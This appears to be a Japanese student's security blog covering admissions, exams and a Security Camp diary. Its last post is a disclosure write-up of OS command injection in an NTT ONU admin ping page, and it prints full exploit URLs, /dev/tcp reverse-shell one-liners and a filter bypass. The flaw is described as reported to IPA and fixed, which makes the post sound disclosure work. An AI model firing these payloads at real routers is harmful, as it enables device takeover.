筑波大学AC入試に落ちた

お久しぶりです。Goyotanです。

今日は筑波大学AC入試の第一次選考(書類選考)の結果が届きました。

結果はタイトル通り不合格でした。

非常に悔しくて結構泣いてしまいました...笑

 

とりあえずこれから受ける人のために何か残せないかと思い、私についての事と何を書いたのかを箇条書きで書いていきます。

 

1.私について

・関東圏のある商業高校生

・パソコンに触り始めたきっかけはPSPの改造

・情報セキュリティと宇宙系と航空系に興味アリ

・車とかバイクが好き

・3年間の平均評定は4.7(5段階評価)くらい

・皆勤賞(今のところ)

・商業高校生なので全商協会という所が主催している検定をいくつか所持

情報処理技術者試験はFEを所持

セキュリティキャンプ2016全国には何とか行けた

・英語と理科系は得意だが数学が弱い(数Ⅲなどはカリキュラムに無いので独学)

Java, Python, C,とかを使う(大規模開発はしたことない)

・Pwnableとネットワークを勉強中

・欠点は分かったつもりになってしまう所、早く結果を求めすぎてしまう所

 

ざっと今書いている中で思いついたことを挙げていきました。

結構出てくるものですね。

 

2.書いたもの

・志願理由書と自己推薦書の2つ(前者は800文字、後者は枚数様式自由)

 

自己推薦書の内容

・自分について(小中現在)

・今までの取り組み

 なぜ筑波を志望するのか(SoftEther,結プロジェクト)

 脆弱性と見つけた経緯(詳細はブログ内)

 Joomla!と呼ばれるCMS脆弱性を見落とした事

 セキュリティキャンプについて

・これからやりたいこと

 日商簿記2級

 応用情報技術者試験

 数学

 脆弱性調査

 声をかけていただいた診断系アルバイト

 

結構アバウトではありますが、このような構成で作成しました。

志願理由書、自己推薦書共にWordで作成しました。

 

f:id:Goyotan:20170921224452p:plain

こちらはプロパティ

17000文字はやはり多かったかなという印象。

 

反省とこれから

正直私は書類に自信がありました。内容も色んな人に見てもらい添削をしていただきました。しかし結果として不合格になりました。一体なぜ不合格になったのかは知る由もありません。ただ、今になって自分の書類を見返すと”面白さ”にかけていたのかなと感じます。それでも約半年の時間をかけてじっくり作成したため、後悔をする部分が殆どありませんでした。私は受験に失敗したと思うのではなく、非常に良い経験ができたと感じます。文中なりブログなりでも、脆弱性について~~みたいな事いっていますが、”高校生”が見つけたというだけで誇張してる感じが自分の中であります。自分の幼さに甘えてしまっている部分がありました。志願理由書に関しては、PDFを直接編集するという作業をしましたが上手くいきませんでした。なので急いで手書きをしたため、丁寧に仕上げることができませんでした。まだまだ思うことは沢山ありますが、胸の中にしまうことにします。

来年以降AC入試を受ける方はぜひ”自分自身”を出しきって頑張ってください!応援しています!

 

話は変わりますが、あっという間に高校生活も終わりが見えてきました。

そうなるとこれから大学生(なれたら?)になります。大学生では自分の立場に甘えることはせず、より一層情報科学について研究していきたいと考えています。もしこのブログを見ている中高生には、やりたい!と思うことがあったらすぐに行動に移してほしいと思います。

さて、私は一つの節目が過ぎたので、また新たな目標に向けて行動します。

🐈最後まで読んでくださり、ありがとうございました。🐈

初インターン?

こんにちは

今年は高校3年生なのでこれからの進路のために技術向上、視野を広げる目的でJNSAにでてる某企業に申し込みをしました。

多分行けることになったのかな?

もし行けることになったらアルバイトとは全く違うのでとても楽しみですが、少し緊張もします。

今年の夏は去年よりもテキパキ行動して色々チャレンジしたい。

基本情報技術者試験に合格した

お久しぶりですGoyotanです。

今日(2017/05/17)は、FE&SGの合格発表でしたね。

結果から述べると無事合格していました。(本当に良かった)

 

今回のアルゴリズムの問題にもなった最短距離を求めるアルゴリズム

過去問にも似たようなものがあり、それを解いている途中本当に理解するのが難しく、

出題されないことをただただ願っていたら見事出題され試験中に諦めモードになっていました。

実際に問いていて頭の中でトレースしていてもゴッチャゴチャになり、

帰りにラーメンを食べるか食べないか、そういえばもう4月も終わりか、など

考えていて完全にハングアップしていました。

 

危ない危ない間一髪のところで、ラーメンよりも目の前の試験が大事なことに気づき

我にかえることができました、、、

 

選択問題なのですが実は私、去年の同じ時期にFEを受験しており

その時は表計算を選択しており午後爆死。

落ちても正直、「秋受かれば勝ち」と考えていましたが、

なんとH28秋季の試験の日は楽しい楽しい修学旅行の出発日でした。(北海道)

皆さんが机に真剣に向かっている間、私(私達)は初飛行機にうへうへしてたり

ジンギスカンを楽しんだり、アイス食べたり、焼き肉食べたりしてました。

(めちゃくちゃ楽しかった、北海道でっかいどう)

 

修学旅行も終わり学期末テストも終わりふにゃふにゃ生きていましたが、

「あ、FEそろそろやん」と焦りはじめ、去年は表計算でダメだったので

リベンジしようかと思ったのですが、C言語で挑戦することにしました。

一緒に受験した友達はみんな表計算を選択していたので、

とても孤独感がありました、、、

 

今回は情報セキュリティ、データベース、C言語に助けられた感じだったので

情報セキュリティに関してはセキュキャンなどのおかげ、

データベースに関しては商業高校でたくさん解いたおかげ、

選択問題に関しては一番最初に触ったC言語のおかげ(?)、と

思っているので色々とお世話になっていることに気づきました。

ありがとうございました。受かって本当によかった。

 

 

〜あとがき〜

今回受かったことで進路用途でFEが使えるのでとても助かります。

最近はTwitterやめてみたり、思い立ったことをやってみたり、夜の公園で3時間くらい

過ごしてみたり、とにかく色々やってみようと模索しています。

これも思春期だからでしょうか。

でも、最近はクラスの出し物でダンスを練習したり、あまり話すことのなかった人と

仲良くなれたりして日常がとても楽しいです。

 

やはり自分は長い文章が苦手です。オチの付け方が分からない、、、

とりあえず6億年ぶりにブログ更新できたので良しとします。

頻繁に面白い報告とかできるようになりたいですね。

最後まで読んでいただきありがとうございました!!

 

f:id:Goyotan:20170517212515p:plain

セキュリティキャンプに参加してきました。

はい。キャンプが終わってもう5日も経ってるんですが、参加記を簡潔に書いていこうと思います。本当に簡単に書くので、あしからず。

 

1日目。

1時間早い電車に乗って海浜幕張駅まで行きました。着いたらすぐ部屋に行けると思っていたのですがダメでした。外で日焼けしてました。

最初にあった方はそけとさんでした。そのあとたくさん色んな方々が来られ、#名刺交換バトルをたくさんしました。

その後、会場入りしみんながそろうまではまた #名刺交換バトルをしました。

この時で50~60枚くらい配りました。(100枚持って行った)

みんなが集まりオリエンテーション的なのを座りながらずっと聞いていたのでトイレに行きたくてやばかったです。(隣の方が倒れたときは本当にびっくりした)

夕食後はグループワークを行い、テーマとチーム名を決めました。

チーム名:.t (どっとてぃー)

その後、コンビニツアーと呼ばれる唯一外の空気が吸えるものに参加し、お菓子と飲み物をゲット。

お風呂は水とお湯を自分で調節するといった”プロ仕様”でした。

もちろん私もプロなので背中に熱湯を浴びるなどしました。

夜は、レンジくんとちひろ氏の部屋に行ってグダグダしてました。

あんまり寝れなかった。

 

2日目

 寝起きはうーーーんって感じでした。ごはんおいしかったです!

最初の講義は「公開鍵のハードウェア実装と攻撃~ICカードが持つ脆弱性とその対策~」でした。

はじめあたりは必死に聞いていたんですが段々と生気を吸い取られていき、最終的には完全にリタイア状態でした。ですが、オシロスコープなどを使い実際にサイドチャネル攻撃をしたことはとても新鮮で面白かったです。

その次の講義は「スマートフォン向けゲームのセキュリティ」でした。

この講義では実際のチート手法や防御法などを学びました。

アプリの通信をBurp suiteで噛ませリクエストを書き換えるといった方法で、スコアをいじったりしました。身近な技術なのでとても面白いなと思える良い講義でした。

夕食後はCTFを行いましたが、色々と障害があり始まる時間が少し遅くなったのですがその間にチューターの方々の成果報告を聞き、とても勉強になりました。

また、バタバタしていたので機会があればまたゆっくり聞きたいです。

CTFはダメでした。はい。

 

3日目

寝起きはよかった。すっきり。

この日は専門講義が3つあるので死なないようにと思いました。

最初の講義は「3-A Webアプリケーションの脆弱性の評価と発見」で、

初めてMasato Kinugawaさんを見ました。実際に脆弱性探しをしたり、CVSSv3での脆弱性評価を行い、とても勉強になりました。普段バグ探しをしているのでいい経験になりました。

次の講義は「オンラインゲームアタック&ディフェンスチャレンジ」でした。

私はジャバSCRIPT is 何って感じだったので周りのプロに色々教わりました。

最初のプレイヤー側はチートの嵐でスコアがとんでもないことになってていい感じにカオスでした。

2回目は運営側として参加し主にBANしまくってました。もうBANBANって感じです。

”運営”という立場を味わえてとても面白かったです。

この日最後の講義は「サーバに対する攻撃とその影響度を調べてディスカッションする講」で、

事前学習では色々と分かったのですがプレゼンと思わなかったので発表時グダグダすぎて無事死にました。

環境もしっかりしたものだったのでいい経験になりました。

企業紹介は「大日本印刷」様で、印刷会社がなんでセキュリティ??というようなお話で勉強になりました。

 

4日目

相変わらず朝が弱いので、目覚ましをEDMに無理やり起きました。(よく覚えてない)

この日最初の講義は「AVRマイコンで作るBadUSB自作」で、半田とか無理やでwな感じだったのですが、工作もそこまで難しくなく、そもそも半田を使いませんでした。

Cでコードが書かれていたのである程度は読めたのですが、BadUSBで何をやろうかというアイデアが浮かばず苦戦しました。

最後の最後に勝手にプロキシを書き換えるってのをやろうと思ったのですがうまくいきませんでした。

でも、部品も安く手軽に作れて楽しかったです。

そしてそしてキャンプ最後の講義は「遠隔操作マルウェアと標的型攻撃からの防衛」でした。

ShinoBOTで有名な凌さんを初めてみてうぉぉ!ってなりました。

あと、Metasploitのステッカーいいなぁと思ってました。

内容はOffensiveなセキュリティの話でとても面白かったです。実際に班で遠隔操作マルウェアを書くということも行い、貴重な体験ができました。

その後の企業紹介は「サイボウズ」様のお話で、サイボウズの社風など色々聞けて参考になりました。

この日の夜は最終日の向けてのプレゼンの資料作りでAM3:30くらいまで起きてて、班員全員が変なテンションでした。(夜に食べるラーメンは犯罪的なおいしさ。)

 

5日目(最終日)

はい。ということであっという間に最終日です。

なぜか目覚めが良く朝からテンション高かったような、、、?

緊張した発表もいい感じにできて良かったです。

最後のゴハーンもとてもおいしかった、、、

成果報告会で竹迫先生に呼ばれたときはとてもびっくりしました。

(何言ったか覚えてない)

その後本などをもらい、取材もされ、サインも頂け、あっという間に解散の時になってしまい、結構寂しかったです。

 

 

感想

ただただ、”楽しかった”。

キャンプでしか味わえないこと。

実際に顔を見合わせて会うこと。自分の意見を恐れずにいうこと。

などなど沢山感じました。4泊5日と、長いような短いような期間でしたが、

得られたことはとても素晴らしいものでした。

ついていけるかとか色々心配してましたが、とてもちっぽけなものだとわかりました。

興味あるな、、でもな、、、って方は絶対に応募するべきです。

とても良い経験をさせてもらい本当にキャンプ関係者の皆様には感謝しています。

本当にありがとうございました。これからもよろしくお願いします。

~以下頂いたもの~

 

f:id:Goyotan:20160818232057j:plain

 

これからについて

実はまだ、これをやるぞ!!!!といったものが具体的にない状態です。

でも、とらえ方を変えれば何でもできるということにもなります!★

だから幅広く深く色々なことをやっていきたいと思っています。

もし、何かこれとかどう?とか、これやろうぜ!とかありましたら是非とも教えていただけると幸いです。

 

 

P.S.

私の納車したてのノーパソが色んな方々のアドバイ悪乗りのおかげで、

イケメン最悪なPCに見事トランスフォームしました。感謝してます卍

あと、ウェイじゃないです。

 

セキュリティキャンプ2016に通りました。

こんにちは:D

最近すっかり気温が上がり、

見事に発汗技術者スペシャリストになったGoyotanです。

今回はセキュキャン2016の選考に通ったので、

自身の整理と誰かしらの役に立てたらいいなと考え、簡潔に記事を書こうと思います。

 

応募用紙について

私は、申し込みが始まる前に昨年やそれまでの参加者の中で、

応募用紙を公開しているブログをできる限り多く閲覧しました。

そこである程度、選択問題を選ぶ際どう選ぶかを重点に考え、

4つ選択する場合、

・2つは自分の得意な分野について。

・もう1つは、あるものに対しての自分の考えを書くもの。(対策方法など)

・最後の1つで、あえて自分の得意ではない分野(私の場合はbin系)

と、構成しようと考えていました。

得意ではない分野については地道に調べ、

実際に手を動かしたことをまとめて書きました。

 

共通問題については、

今回の場合、”自分の開発したもの”を沢山書け。

というものだったのですが、私は開発をあまりしたことがありませんでした。

この問題については、正直に開発したことがない旨、

以前に作ったもの(2つのみ)を書きました。

その後、他の参加者の応募用紙を見ると数十個やそれ以上書いてる方がおり、

最初はとても絶望していました。。。。

そこで、”セキュキャンで何を学びたいか”という問題で、

・自分の学びたいこと

・技術力をつけて何をするか/何を目指すか

・セキュリティ以外のことも学びたい

ということを、”熱意”をこめて書いたつもりです。

私の中での”熱意”は、やりたい!!!やってみたい!!!

も、当たり前なのですが

あることをやりたい。では、その前にしっかりと調べ

その後、何につなげるられるかを明確にすることだと考えています。

このように、私は一つの”線”として考えを応募用紙を書きました。

 

また、”参加者間での関わり”も重要と考えました。

選考に通ったけれども。

合格の知らせを受け取ったときは、とてもうれしく跳ね回りました。

ですが、講師陣や修了生の方々は”セキュキャン”がゴールではない。

と、皆さん口をそろえておっしゃっています。

私もその通りだと考えています。

セキュキャンはあくまで通過点であり、そこで生かした技術を

どうこれからに役立て行くかは自分の手にかかっていりると考え、

さらに上への向上心を忘れずに過ごしていこうと再度肝に銘じました。

最後に、残念ながらセキュキャンの選考に外れてしまった方の中でも

遥かに私より技術力がある人はたくさんおり、ほとんどです。

なので私はセキュキャン以外の場所でも、こういった方々と

積極的に関わっていきたいと考えております。

 

長くなり、乱文になりましたがこれで終わりにしたいと思います。

それでは!

Microsoftのサイトに存在したXSSの脆弱性

今回は、特に技術的な投稿ではなく
少し前にMSのサイトで見つけたXSS脆弱性の修正が知らせを受けたので感じたことを書こうと思います。

以前からちょこちょこXSSを見つけては報告していましたが、MSのような大きなサイトで見つけられたのは大変ビックリしました。
また、フォーラムに記述されたスクリプトも検索にヒットさせ、実行させる。
というものもあり、こんな方法もあるのか。
と少し勉強になりました( ˃ ⌑︎ ˂ )
f:id:Goyotan:20160226202612p:image


まだまだ技術的には勉強中なのですが、お礼のメールを受け取った時は結構嬉しかったです(๑و•̀ω•́)و 

f:id:Goyotan:20160226202831p:image

これからも、倫理観や技術力を高めていき一つでも多く報告していこうと思いました!( ` ・ω・ ´ )

NTTのONU(光回線終端装置)にある脆弱性

 

 

※2016年6月27日にIPAを介し、脆弱性修正が出来たとの連絡がありました。だいぶ前に書いた記事なのでおかしいところがあると思いますがので、後ほど修正します( ` ・ω・ ´ )

 

CVE-2016-1227:OS command injection

CVE-2016-1228:CSRF

となりました。

 

タイトル通りに、NTTから貸出されているONU(PR-400MI)に

OSコマンドインジェクションの脆弱性を見つけたので書こうと思います。

 

このONUの管理者画面には、LAN上の端末に対してpingテストをする機能があり、

そこのパラメータへOSコマンドを挿入することで発生します。

 

ブラウザ上で普通にテストをするとURL欄に変化がないので、chromeの開発者ツールを使い実際にONUに送信しているURLをゲット。

http://192.168.1.1/index.fcgi?gui_cmd_mnt_ping_view&PingTarget=192.168.1.2&cmd=gui_cmd_mnt_ping_execute

こんな感じのURLリクエスト。

 

あとは典型的にセミコロン区切りでコマンドを挿入するだけで、

http://192.168.1.1/index.fcgi?gui_cmd_mnt_ping_view&PingTarget=192.168.1.2;ls&cmd=gui_cmd_mnt_ping_execute

やったぜ。

f:id:Goyotan:20160221010908p:plain

 

あとは、ncとか使えばシェル取れそうだな~と思いつつ、リバースシェルのペイロードを送るも、ncなんか入ってないぞ。

と怒られる。

 

perlなりpythonなりで!(^^)

と、試行錯誤するも全部入ってない。

とりあえずwgetで何か落させればいいや。とwgetコマンド打つも

記述方法がちょっと違うことに気付く。

色々と調べてると、どうやらBusyBoxなるものが入っているらしい。

(組み込みシステムにみられるコマンド群)

 

なるほど、BusyBoxで使えるコマンドの中には他のLinuxで使えるコマンドが入ってないものもあるのか。

などなど知見を得ながらしばらく悩み、/dev/tcpを使ったリバースシェルの方法を知った。

bash -i >& /dev/tcp/ATTACKER_IP/8080 0>&1

やったぜと思いながら、

ip:192.168.1.6のubuntuで、nc -nvlp 4444 -vvvでリスナを建て、

http://192.168.1.1/index.fcgi?gui_cmd_mnt_ping_view&PingTarget=192.168.1.2;bash -i >& /dev/tcp/192.168.1.6/4444 0>&1&cmd=gui_cmd_mnt_ping_execute

上記のリクエストを送信すると。

 

500 Internal Server Error

 

まぁ、一発じゃできませんでした。

ここからが長かった、、、。

Reverse Shell Cheat Sheet

ここに書いてある別のペイロードを使うも、全部エラー。

また、煩わしいことに一度エラーになると再起動しなければならず、一回のリクエスト送信が慎重になり時間がかかってしまった。

 

だらだらと書くのもよくないので、やったことを書きます。

 

結論:

URLをなるべく短くする。

ペイロードの変更。

 

http://192.168.1.1/index.fcgi?PingTarget=192.168.1.2&cmd=gui_cmd_mnt_ping_execute

さらに、ping対象アドレスを抜くとエラーになるため、

http://192.168.1.1/index.fcgi?PingTarget=....&cmd=gui_cmd_mnt_ping_execute

と、....ドット4つでバイパスした。

 

最終的に、

http://192.168.1.1/index.fcgi?PingTarget=....;/bin/sh 0>/dev/tcp/192.168.1.6/4444 ;sh <&196 >&196 2>&196&cmd=gui_cmd_mnt_ping_execute

少しだけだが短くなり成功した。

 

そしてシェル開通。

f:id:Goyotan:20160221013735p:plain

 

標準入出力あたりが上手くいかなかったのか、

打ったコマンドの結果がブラウザ上でしか反映されなかったのが残念。

 

今回は身近なところにあったので楽しめた。

また、色々と新しいことが学べたのでいい経験にもなった。

今度は他のデバイスについても調べてみたい。

IPAには報告済みです。